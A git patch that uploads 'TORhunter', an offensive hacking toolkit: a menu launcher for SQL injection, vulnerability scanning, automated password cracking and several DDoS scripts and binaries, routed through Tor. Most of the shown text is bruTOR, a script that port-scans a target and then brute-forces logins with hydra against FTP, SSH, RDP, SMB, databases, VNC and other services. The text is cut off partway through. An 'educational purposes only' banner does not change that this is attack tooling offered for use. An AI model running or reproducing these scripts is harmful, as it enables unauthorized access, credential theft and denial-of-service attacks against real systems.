From 270ab19cfd4d670e7477e30922906ca5ed2f96e0 Mon Sep 17 00:00:00 2001 From: *ERR0R* <59941931+Err0r-ICA@users.noreply.github.com> Date: Sat, 21 Nov 2020 19:33:11 +0100 Subject: [PATCH] Add files via upload --- TORhunter | 183 +++++++++++++++++++++++++++++ bruTOR | 329 ++++++++++++++++++++++++++++++++++++++++++++++++++++ bruTOR.sh | 8 ++ cDDoS | Bin 0 -> 18048 bytes cDDoS.c | 184 +++++++++++++++++++++++++++++ cport.sh | 16 +++ cproxy.sh | 31 +++++ ddos | Bin 0 -> 17560 bytes ddos.c | 100 ++++++++++++++++ ddos.sh | 21 ++++ ddos8000.sh | 1 + ddosx4.sh | 7 ++ install.sh | 45 +++++++ nmap.sh | 15 +++ proxy.sh | 33 ++++++ run.sh | 35 ++++++ sql.sh | 8 ++ targets.txt | 3 + 18 files changed, 1019 insertions(+) create mode 100644 TORhunter create mode 100644 bruTOR create mode 100644 bruTOR.sh create mode 100644 cDDoS create mode 100644 cDDoS.c create mode 100644 cport.sh create mode 100644 cproxy.sh create mode 100644 ddos create mode 100644 ddos.c create mode 100644 ddos.sh create mode 100644 ddos8000.sh create mode 100644 ddosx4.sh create mode 100644 install.sh create mode 100644 nmap.sh create mode 100644 proxy.sh create mode 100644 run.sh create mode 100644 sql.sh create mode 100644 targets.txt diff --git a/TORhunter b/TORhunter new file mode 100644 index 0000000..ac57583 --- /dev/null +++ b/TORhunter @@ -0,0 +1,183 @@ +#!/bin/bash +# TORhunter +# Written by: Err0r_HB ~ HackBoyz (2020) +# Do NOT copy, noooooob! + +sudo +clear +for i in {80..226} {226..80} ; do echo -en "\033[38;5;${i}mBrought to you by: Err0r_HB \e[0m" ; done ; echo +sleep 3.4 + + function Vigilance_Recon +{ +option=0 +until [ "$option" = "1" ]; do +echo -e "\033[1;95m[\033[1;97m01\033[1;95m] \033[1;92mConnect to TOR/Proxy" +echo -e "\033[1;95m[\033[1;97m02\033[1;95m] \033[1;92mDisconnect TOR/PROXY" +echo -e "\033[1;95m[\033[1;97m03\033[1;95m] \033[1;92mNmap" +echo -e "\033[1;95m[\033[1;97m04\033[1;95m] \033[1;92mFull Port Scan" +echo -e "\033[1;95m[\033[1;97m05\033[1;95m] \033[1;92mCustom Port Scan" +echo -e "\033[1;95m[\033[1;97m06\033[1;95m] \033[1;92mCustom Proxy" +echo -e "\033[1;95m[\033[1;97m t\033[1;95m] \033[1;92mTarget Notes" +echo -e "\033[1;95m[\033[1;97m b\033[1;95m] \033[1;92mMain Menu" +echo "" +echo -e -n "\033[1;92mroot\033[1;95m@\033[1;96mtorhunter\033[1;97m:~# " +read option +echo "" +case $option in + 1 ) sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/proxy.sh" & ;; + 2 ) sudo service tor stop ;; + 3 ) sudo nmap 127.0.0.1 -PN ;; + 4 ) sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/nmap.sh" & ;; + 5 ) sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/cport.sh" & ;; + 6 ) sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/cproxy.sh" & ;; + t ) sudo terminator 2>/dev/null -e "sudo nano /home/YOUR_USER_NAME/TORhunter/targets.txt" & ;; + b ) main_menu ;; + * ) tput setf 4;echo "echo -n "root@torhunter:~#:"";tput setf 4; +esac +done + } + + + function Vengeance_Exploit +{ +option=0 +until [ "$option" = "2" ]; do +echo -e "\033[1;95m[\033[1;97m01\033[1;95m] \033[1;92mDatabase Exploit/Injection" +echo -e "\033[1;95m[\033[1;97m02\033[1;95m] \033[1;92mXSS/Vulnerability Scan" +echo -e "\033[1;95m[\033[1;97m03\033[1;95m] \033[1;92mFull Site Mapper" +echo -e "\033[1;95m[\033[1;97m04\033[1;95m] \033[1;92mDirectory Scan" +echo -e "\033[1;95m[\033[1;97m05\033[1;95m] \033[1;92mAutomated Password Cracking" +echo -e "\033[1;95m[\033[1;97m06\033[1;95m] \033[1;92mDDoS (Xerxes)" +echo -e "\033[1;95m[\033[1;97m07\033[1;95m] \033[1;92mDDoS (Xerxes x4 ) Port 8000" +echo -e "\033[1;95m[\033[1;97m08\033[1;95m] \033[1;92mCustomized DDoS" +echo -e "\033[1;95m[\033[1;97m t\033[1;95m] \033[1;92mTarget Notes" +echo -e "\033[1;95m[\033[1;97m b\033[1;95m] \033[1;92mMain Menu" +echo "" +echo -e -n "\033[1;92mroot\033[1;95m@\033[1;96mtorhunter:\033[1;97m~# " +read option +echo "" +case $option in + 1 ) sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/sql.sh" & ;; + 2 ) sudo terminator 2>/dev/null -e "sudo nikto -host 127.0.0.1 -port 8000" & ;; + 3 ) sudo terminator 2>/dev/null -e "sudo uniscan -u http://127.0.0.1:8000 -qwedsrgj" & ;; + 4 ) sudo terminator 2>/dev/null -e "sudo uniscan -u http://127.0.0.1:8000 -q" & ;; + 5 ) sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/bruTOR.sh" & ;; + 6 ) etherape 2>/dev/nul | sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/ddos.sh" & ;; + 7 ) etherape 2>/dev/nul | sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/ddosx4.sh" & ;; + 8 ) etherape 2>/dev/nul | sudo terminator 2>/dev/null -e "sudo /home/YOUR_USER_NAME/TORhunter/cDDoS" & ;; + t ) sudo terminator 2>/dev/null -e "sudo nano /home/YOUR_USER_NAME/TORhunter/targets.txt" & ;; + b ) main_menu ;; + * ) tput setf 4;echo "echo -n "root@torhunter:~#:"";tput setf 4; +esac +done + } + +clear +function Verbose_Report +{ +option=0 +until [ "$option" = "3" ]; do + echo -e "\033[1;95m[\033[1;97m01\033[1;95m] \033[1;92mGeolocate IP on a Map" + echo -e "\033[1;95m[\033[1;97m02\033[1;95m] \033[1;92mFile Uploader (Send Link in Email)" + echo -e "\033[1;95m[\033[1;97m03\033[1;95m] \033[1;92mAnonymous E-Mail" +echo -e "\033[1;95m[\033[1;97m t\033[1;95m] \033[1;92mTarget Notes" + echo -e "\033[1;95m[\033[1;97m b\033[1;95m] \033[1;92mMain Menu" +echo "" + echo -e -n "\033[1;92mroot\033[1;95m@\033[1;96mtorhunter\033[1;97m:~#: " + read option + echo "" + case $option in + 1 ) xdg-open 2>/dev/null https://iplocation.com/ ;; + 2 ) /home/YOUR_USER_NAME/.local/share/torbrowser/tbb/x86_64/tor-browser_en-US/Browser/start-tor-browser https://www.filedropper.com/ ;; + 3 ) /home/YOUR_USER_NAME/.local/share/torbrowser/tbb/x86_64/tor-browser_en-US/Browser/start-tor-browser https://protonirockerxow.onion/ --no-remote ;; + t ) terminator 2>/dev/null -e "sudo nano /home/YOUR_USER_NAME/TORhunter/targets.txt" & ;; + secret ) sudo terminator 2>/dev/null -e "sudo nano /home/YOUR_USER_NAME/TORhunter/wordlists/passswords.txt" & ;; + b ) main_menu ;; + * ) tput setf 3;echo "echo -n "root@torhunter:~#"";tput setf 3; + esac + done +} + +function main_menu +{ +option=0 +until [ "$option" = "4" ]; do + +clear +echo -e ''' +\e[1;91m ╔═══════════╗ +\e[1;91m ╔═╝\e[1;97m███████████\e[1;91m╚═╗ +\e[1;91m ╔╝\e[1;97m███████████████\e[1;91m╚╗ +\e[1;91m ║\e[1;97m██████\e[1;92mERR0R\e[1;97m██████\e[1;91m║ +\e[1;91m ║\e[1;97m█████████████████\e[1;91m║\e[1;91m +\e[1;91m ║\e[1;97m█████████████████\e[1;91m║\e[1;91m +\e[1;91m ║\e[1;97m█\e[1;91m╔\e[1;97m█████████████\e[1;91m╗\e[1;97m█\e[1;91m║\e[1;91m +\e[1;91m ╚╦╝\e[1;97m███\e[1;90m▒▒\e[1;97m███\e[1;90m▒▒\e[1;97m███\e[1;91m╚╦╝\e[1;91m +\e[1;91m ╔╝\e[1;97m██\e[1;90m▒▒▒▒\e[1;97m███\e[1;90m▒▒▒▒\e[1;97m██\e[1;91m╚╗\e[1;91m +\e[1;91m ║\e[1;97m██\e[1;90m▒▒▒▒▒\e[1;97m███\e[1;90m▒▒▒▒▒\e[1;97m██\e[1;91m|\e[1;91m +\e[1;91m ║\e[1;97m██\e[1;90m▒▒▒▒\e[1;97m█████\e[1;90m▒▒▒▒\e[1;97m██\e[1;91m║\e[1;94m +\e[1;91m ╚╗\e[1;97m███████████████\e[1;91m╔╝\e[1;94m +\e[1;91m ╔═╬══╦╝\e[1;97m██\e[1;90m▒\e[1;97m█\e[1;90m▒\e[1;97m██\e[1;91m╚╦══╝\e[1;90m .▒.. +\e[1;91m ║\e[1;97m█\e[1;91m║══║\e[1;97m█████████\e[1;91m║\e[1;90m ...▒. \e[1;93m +\e[1;91m ║\e[1;97m█\e[1;91m║══║\e[1;97m█\e[1;91m║\e[1;97m██\e[1;91m║\e[1;97m██\e[1;91m║\e[1;97m█\e[1;91m║\e[1;90m .▒.. +\e[1;91m ║\e[1;97m█\e[1;91m║══╚═╩══╩╦═╩═╩═╦╗\e[1;90m▒. +\e[1;91m ╔╝\e[1;97m█\e[1;91m╚══╦═╦══╦╩═╦═╦═╩╝ \e[38;5;48m +\e[1;91m╔╝\e[1;97m█████\e[1;91m║\e[1;97m█\e[1;91m║\e[1;97m██\e[1;91m║\e[1;97m██\e[1;91m║\e[1;97m█\e[1;91m║ +\e[1;91m║\e[1;97m██████\e[1;91m║\e[1;97m█████████\e[1;91m║ +''' +sleep 1.2 +echo -e ''' +\033[38;5;56m████████\033[38;5;199m╗\033[38;5;56m ██████\033[38;5;199m╗ \033[38;5;56m██████\033[38;5;199m╗ \033[38;5;56m██\033[38;5;199m╗ \033[38;5;56m██\033[38;5;199m╗\033[38;5;56m██\033[38;5;199m╗ \033[38;5;56m██\033[38;5;199m╗\033[38;5;56m███\033[38;5;199m╗ \033[38;5;56m██\033[38;5;199m╗\033[38;5;56m████████\033[38;5;199m╗\033[38;5;56m███████\033[38;5;199m╗\033[38;5;56m██████\033[38;5;199m╗ +\033[38;5;56m\033[38;5;199m╚══\033[38;5;56m██\033[38;5;199m╔══╝\033[38;5;56m██\033[38;5;199m╔═══\033[38;5;56m██\033[38;5;199m╗\033[38;5;56m██\033[38;5;199m╔══\033[38;5;56m██\033[38;5;199m╗\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m████\033[38;5;199m╗ \033[38;5;56m██\033[38;5;199m║╚══\033[38;5;56m██\033[38;5;199m╔══╝\033[38;5;56m██\033[38;5;199m╔════╝\033[38;5;56m██\033[38;5;199m╔══\033[38;5;56m██\033[38;5;199m╗ +\033[38;5;56m ██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m██████\033[38;5;199m╔╝\033[38;5;56m███████\033[38;5;199m║\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m██\033[38;5;199m╔\033[38;5;56m██\033[38;5;199m╗ \033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║ \033[38;5;56m█████\033[38;5;199m╗ \033[38;5;56m██████\033[38;5;199m╔╝ +\033[38;5;56m ██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m██\033[38;5;199m╔══\033[38;5;56m██\033[38;5;199m╗\033[38;5;56m██\033[38;5;199m╔══\033[38;5;56m██\033[38;5;199m║\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m██\033[38;5;199m║╚\033[38;5;56m██╗\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m╔══╝ \033[38;5;56m██\033[38;5;199m╔══\033[38;5;56m██\033[38;5;199m╗ +\033[38;5;56m ██\033[38;5;199m║ ╚\033[38;5;56m██████\033[38;5;199m╔╝\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║╚\033[38;5;56m██████\033[38;5;199m╔╝\033[38;5;56m██\033[38;5;199m║ ╚\033[38;5;56m████\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║ \033[38;5;56m███████\033[38;5;199m╗\033[38;5;56m██\033[38;5;199m║ \033[38;5;56m██\033[38;5;199m║ +\033[38;5;199m ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ +''' +sleep 1 +echo -e """ +\e[38;5;197m ꧁෴╔══════════════════❖•ೋ°៚°ೋ•❖══════════════════╗෴꧂ +\e[1;91m ➣Name ⇶ TORhunter +\e[1;92m ➣Author → *ERR0R_HB* +\e[1;93m ➣Github ⇶ https://github.com/Err0r-ICA +\e[1;94m ➣Instagram → t.me/termuxxhacking +\e[1;96m ➣Telegram ⇶ @termux_hacking +\e[1;95m ➣Team → ~HACKBOYZ~ +\e[1;94m ➣Twitter ⇶ twitter.com/HHackboyz +\e[38;5;197m ꧁෴╚══════════════════❖•ೋ°៚°ೋ•❖══════════════════╝෴꧂ +\e[1;93m *Press 'CTRL + Z' to exit* + + \033[1;92m████\033[1;97m████\033[1;91m████ + \033[1;92m████\033[1;97m████\033[1;91m████ + \033[1;92m████\033[1;97m████\033[1;91m████ + \033[1;92m████\033[1;97m████\033[1;91m████ +""" +sleep 1.5 +echo -e " \033[1;91m@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@" +echo -e " \033[1;91m§\033[1;93mThis software is for educational purposes ONLY \033[1;91m§\n\033[1;91m §\033[1;93mAnd NOT6 meant to be used illegally in any way!\033[1;91m§" + echo -e " \033[1;91m#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#" +echo "" +echo "" + echo -e "\033[1;95m[\033[1;97m01\033[1;95m] \033[1;92mVigilance/Recon" +echo -e "\033[1;95m[\033[1;97m02\033[1;95m] \033[1;92mVengeance/Exploit" +echo -e "\033[1;95m[\033[1;97m03\033[1;95m] \033[1;92mVerbose/Report" +echo "" + echo -e "\033[1;95m[\033[1;97m g\033[1;95m] \033[1;97m\033[1;101mQuit\033[0m" +echo "" + echo -e "\033[1;93mType option or help and press \033[1;92mENTER" +echo "" + echo -e -n "\e[38;5;47mroot@\e[38;5;197mtorhunter:~# " +read option +echo "" +case $option in + 1 ) Vigilance_Recon ; ;; + 2 ) Vengeance_Exploit ; ;; + 3 ) Verbose_Report ; ;; + help ) xdg-open 2>/dev/null https://github.com/Err0r-ICA#usage ;; + q ) exit ;; + * ) tput setf 4;echo -n "root@torhunter:~#: ";tput setf 4; +esac +done + } +main_menu diff --git a/bruTOR b/bruTOR new file mode 100644 index 0000000..43a77dc --- /dev/null +++ b/bruTOR @@ -0,0 +1,329 @@ +#!/bin/bash +TARGET="$1" +PORT="$2" +VER="1.9" +LOOT_DIR=/root/Vigilante-Toolset/loot/ +FTP_USER_PASS="/root/Vigilante-Toolset/wordlists/ftp-default-userpass.txt" +FTP_USERS="/root/Vigilante-Toolset/wordlists/ftp_defuser.lst" +FTP_PASS="/root/Vigilante-Toolset/wordlists/ftp_defpass.lst" +SSH_USER_PASS="/root/Vigilante-Toolset/wordlists/ssh-default-userpass.txt" +SSH_USERS="/root/Vigilante-Toolset/wordlists/ssh_defuser.lst" +SSH_PASS="/root/Vigilante-Toolset/wordlists/ssh_defpass.lst" +SMTP_USERS="/root/Vigilante-Toolset/wordlists/smtp_defuser.lst" +SMTP_PASS="/root/Vigilante-Toolset/wordlists/smtp_defpass.lst" +POP_USERS="/root/Vigilante-Toolset/wordlists/pop_defusers.lst" +POP_PASS="/root/Vigilante-Toolset/wordlists/pop_defpass.lst" +TELNET_USER_PASS="/root/Vigilante-Toolset/wordlists/telnet-default-userpass.txt" +TELNET_USERS="/root/Vigilante-Toolset/wordlists/telnet_defuser.lst" +TELNET_PASS="/root/Vigilante-Toolset/wordlists/telnet_defpass.lst" +SQL_USERS="/root/Vigilante-Toolset/wordlists/sql_defuser.lst" +SQL_PASS="/root/Vigilante-Toolset/wordlists/sql_defpass.lst" +MSSQL_USER_PASS="/root/Vigilante-Toolset/wordlists/mssql-default-userpass.txt" +MYSQL_USER_PASS="/root/Vigilante-Toolset/wordlists/mysql-default-userpass.txt" +ORACLE_USER_PASS="/root/Vigilante-Toolset/wordlists/oracle-default-userpass.txt" +POSTGRES_USER_PASS="/root/Vigilante-Toolset/wordlists/postgres-default-userpass.txt" +WINDOWS_USER_LIST="/root/Vigilante-Toolset/wordlists/windows-users.txt" +WINDOWS_USER_PASS="/root/Vigilante-Toolset/wordlists/windows-default-userpass.txt" +USER_FILE="/root/Vigilante-Toolset/wordlists/simple-users.txt" +PASS_FILE="/root/Vigilante-Toolset/wordlists/password.lst" +SNMP_FILE="/root/Vigilante-Toolset/wordlists/snmp-strings.txt" +VNC_FILE="/root/Vigilante-Toolset/wordlists/vnc-default-passwords.txt" +HTTP_LOCATION="/" +THREADS="12" +COLOR1='\033[91m' +COLOR2='\033[92m' +COLOR3='\033[92m' +RESET='\e[0m' + +# UN-COMMENT TO ENABLE PROXY +#export HYDRA_PROXY=socks4://127.0.0.1:9050 + +#if [ -z $TARGET ]; then + #echo -e "$COLOR1 ____ ______ _____ ____ $RESET" + #echo -e "$COLOR1 /\ _`\ /\__ _\/\ __`\/\ _`\ $RESET" + #echo -e "$COLOR1 \ \ \L\ \ _ __ __ __\/_/\ \/\ \ \/\ \ \ \L\ \ $RESET" + #echo -e "$COLOR1 \ \ _ <'/\`'__\/\ \/\ \ \ \ \ \ \ \ \ \ \ , / $RESET" + #echo -e "$COLOR1 \ \ \L\ \ \ \/ \ \ \_\ \ \ \ \ \ \ \_\ \ \ \\ \ $RESET" + #echo -e "$COLOR1 \ \____/\ \_\ \ \____/ \ \_\ \ \_____\ \_\ \_\ $RESET" + #echo -e "$COLOR1 \/___/ \/_/ \/___/ \/_/ \/_____/\/_/\/ / $RESET" + # exit +#fi + +DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) + +echo -e "$COLOR1 $RESET" +echo -e "$COLOR1 $RESET" +echo -e "$COLOR1 $RESET" +echo -e "$COLOR1 $RESET" +echo -e "$COLOR1 $RESET" +echo -e "$COLOR1 $RESET" +echo "" +echo -e "$COLOR1 + -- --=[BruteX v$VER by @xer0dayz$RESET" +echo -e "$COLOR1 + -- --=[http://xerosecurity.com$RESET" +echo "" +echo "" + +echo -e "$COLOR3################################### Running Port Scan ##############################$RESET" +if [ -z "$PORT" ] +then + nmap -T4 -P0 --open $TARGET -p21,22,23,25,53,8000,110,139,162,389,443,445,512,513,514,993,1433,1521,3306,3389,5432,5900,5901,8000,8080,6667 -oX $LOOT_DIR/nmap-$TARGET.xml +else + nmap -T4 -P0 --open $TARGET -p $PORT -oX $LOOT_DIR/nmap-$TARGET.xml +fi +echo "" +echo -e "$COLOR3################################### Running Brute Force ############################$RESET" +echo "" +port_21=`grep 'portid="21"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_22=`grep 'portid="22"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_23=`grep 'portid="23"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_25=`grep 'portid="25"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_110=`grep 'portid="110"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_139=`grep 'portid="139"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_162=`grep 'portid="162"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_389=`grep 'portid="389"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_443=`grep 'portid="443"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_445=`grep 'portid="445"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_512=`grep 'portid="512"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_513=`grep 'portid="513"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_512=`grep 'portid="514"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_993=`grep 'portid="993"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_1433=`grep 'portid="1433"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_1521=`grep 'portid="1521"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_5901=`grep 'portid="5901"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap-$TARGET.xml | grep open` +port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap-$TARGET.xml | grep open` + +if [ -z "$port_21" ] +then + echo -e "$COLOR1 + -- --=[Port 21 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 21 opened... running tests...$RESET" + hydra -C $FTP_USER_PASS $TARGET ftp -t $THREADS -e ns + hydra -L $FTP_USERS -P $FTP_PASS $TARGET ftp -t $THREADS -e ns +fi + +if [ -z "$port_22" ] +then + echo -e "$COLOR1 + -- --=[Port 22 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 22 opened... running tests...$RESET" + hydra -C $SSH_USER_PASS $TARGET ssh -t $THREADS -e ns + hydra -L $USER_FILE -P $PASS_FILE $TARGET ssh -t $THREADS -e ns + hydra -L $SSH_USERS -P $SSH_PASS $TARGET ssh -t $THREADS -e ns +fi + +if [ -z "$port_23" ] +then + echo -e "$COLOR1 + -- --=[Port 23 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 23 opened... running tests...$RESET" + hydra -C $TELNET_USER_PASS $TARGET telnet -t $THREADS -e ns + hydra -L $USER_FILE -P $PASS_FILE $TARGET telnet -t $THREADS -e ns + hydra -L $TELNET_USERS -P $TELNET_PASS $TARGET telnet -t $THREADS -e ns +fi + +if [ -z "$port_25" ] +then + echo -e "$COLOR1 + -- --=[Port 25 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 25 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp-enum -t $THREADS -e ns + hydra -L $USER_FILE -P $PASS_FILE $TARGET smtp -t $THREADS -e ns + hydra -L $SMTP_USERS -P $SMTP_PASS $TARGET smtp -t $THREADS -e ns +fi + +if [ -z "$port_8000" ] +then + echo -e "$COLOR1 + -- --=[Port 8000 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 8000 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET http-get -t $THREADS -f -q -e ns -m $HTTP_LOCATION -V +fi + +if [ -z "$port_110" ] +then + echo -e "$COLOR1 + -- --=[Port 110 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 110 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET pop3 -t $THREADS -e ns + hydra -L $POP_USERS -P $POP_PASS $TARGET pop3 -t $THREADS -e ns +fi + +if [ -z "$port_139" ] +then + echo -e "$COLOR1 + -- --=[Port 139 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 139 opened... running tests...$RESET" + hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET smb -S 139 -t $THREADS -e ns +fi + +if [ -z "$port_162" ] +then + echo -e "$COLOR1 + -- --=[Port 162 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 162 opened... running tests...$RESET" + hydra -P $SNMP_FILE snmp -S 162 -t $THREADS -e ns +fi + +if [ -z "$port_389" ] +then + echo -e "$COLOR1 + -- --=[Port 389 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 389 opened... running tests...$RESET" + hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET ldap2 -S 389 -t $THREADS -e ns + hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET ldap3 -S 389 -t $THREADS -e ns +fi + +if [ -z "$port_443" ] +then + echo -e "$COLOR1 + -- --=[Port 443 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 443 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET https-get -s 443 -t $THREADS -f -q -e ns -m $HTTP_LOCATION +fi + +if [ -z "$port_445" ] +then + echo -e "$COLOR1 + -- --=[Port 445 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 445 opened... running tests...$RESET" + hydra -C $WINDOWS_USER_PASS $TARGET smb -S 445 -t $THREADS -e ns + hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET smb -S 445 -t $THREADS -e ns +fi + +if [ -z "$port_512" ] +then + echo -e "$COLOR1 + -- --=[Port 512 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 512 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET rexec -S 512 -t $THREADS -e ns +fi + +if [ -z "$port_513" ] +then + echo -e "$COLOR1 + -- --=[Port 513 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 513 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET rlogin -S 513 -t $THREADS -e ns +fi + +if [ -z "$port_514" ] +then + echo -e "$COLOR1 + -- --=[Port 514 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 514 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET rsh -S 514 -t $THREADS -e ns +fi + +if [ -z "$port_993" ] +then + echo -e "$COLOR1 + -- --=[Port 993 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 993 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET imap -S 993 -t $THREADS -e ns +fi + +if [ -z "$port_1433" ] +then + echo -e "$COLOR1 + -- --=[Port 1433 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 1433 opened... running tests...$RESET" + hydra -C $MSSQL_USER_PASS $TARGET mssql -S 1433 -t $THREADS -e ns + hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET mssql -S 1433 -t $THREADS -e ns +fi + +if [ -z "$port_1521" ] +then + echo -e "$COLOR1 + -- --=[Port 1521 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 1521 opened... running tests...$RESET" + hydra -C $ORACLE_USER_PASS $TARGET oracle -S 1521 -t $THREADS -e ns +fi + +if [ -z "$port_3306" ] +then + echo -e "$COLOR1 + -- --=[Port 3306 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 3306 opened... running tests...$RESET" + hydra -C $MYSQL_USER_PASS $TARGET mysql -t $THREADS -e ns + hydra -L $SQL_USERS -P $SQL_PASS $TARGET mysql -t $THREADS -e ns +fi + +if [ -z "$port_3389" ] +then + echo -e "$COLOR1 + -- --=[Port 3389 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 3389 opened... running tests...$RESET" + hydra -C $WINDOWS_USER_PASS $TARGET rdp -t $THREADS -e ns + hydra -L $WINDOWS_USER_LIST -P $PASS_FILE $TARGET rdp -t $THREADS -e ns +fi + +if [ -z "$port_5432" ] +then + echo -e "$COLOR1 + -- --=[Port 5432 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 5432 opened... running tests...$RESET" + hydra -C $POSTGRES_USER_PASS $TARGET postgres -t $THREADS -e ns +fi + +if [ -z "$port_5900" ] +then + echo -e "$COLOR1 + -- --=[Port 5900 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 5900 opened... running tests...$RESET" + hydra -P $VNC_FILE $TARGET vnc -S 5900 -t $THREADS -e ns + hydra -P $PASS_FILE $TARGET vnc -S 5900 -t $THREADS -e ns +fi + +if [ -z "$port_5901" ] +then + echo -e "$COLOR1 + -- --=[Port 5901 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 5901 opened... running tests...$RESET" + hydra -P $VNC_FILE $TARGET vnc -S 5901 -t $THREADS -e ns + hydra -P $PASS_FILE $TARGET vnc -S 5901 -t $THREADS -e ns +fi + +if [ -z "$port_6667" ] +then + echo -e "$COLOR1 + -- --=[Port 6667 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 6667 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET irc -s 6667 -t $THREADS -e ns +fi + +if [ -z "$port_8000" ] +then + echo -e "$COLOR1 + -- --=[Port 8000 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 8000 opened... running tests...$RESET" + hydra -L $USER_FILE -P $PASS_FILE $TARGET http-head -s 8000 -f -q -t $THREADS -e ns -m / +fi + +if [ -z "$port_8080" ] +then + echo -e "$COLOR1 + -- --=[Port 8080 closed... skipping.$RESET" +else + echo -e "$COLOR2 + -- --=[Port 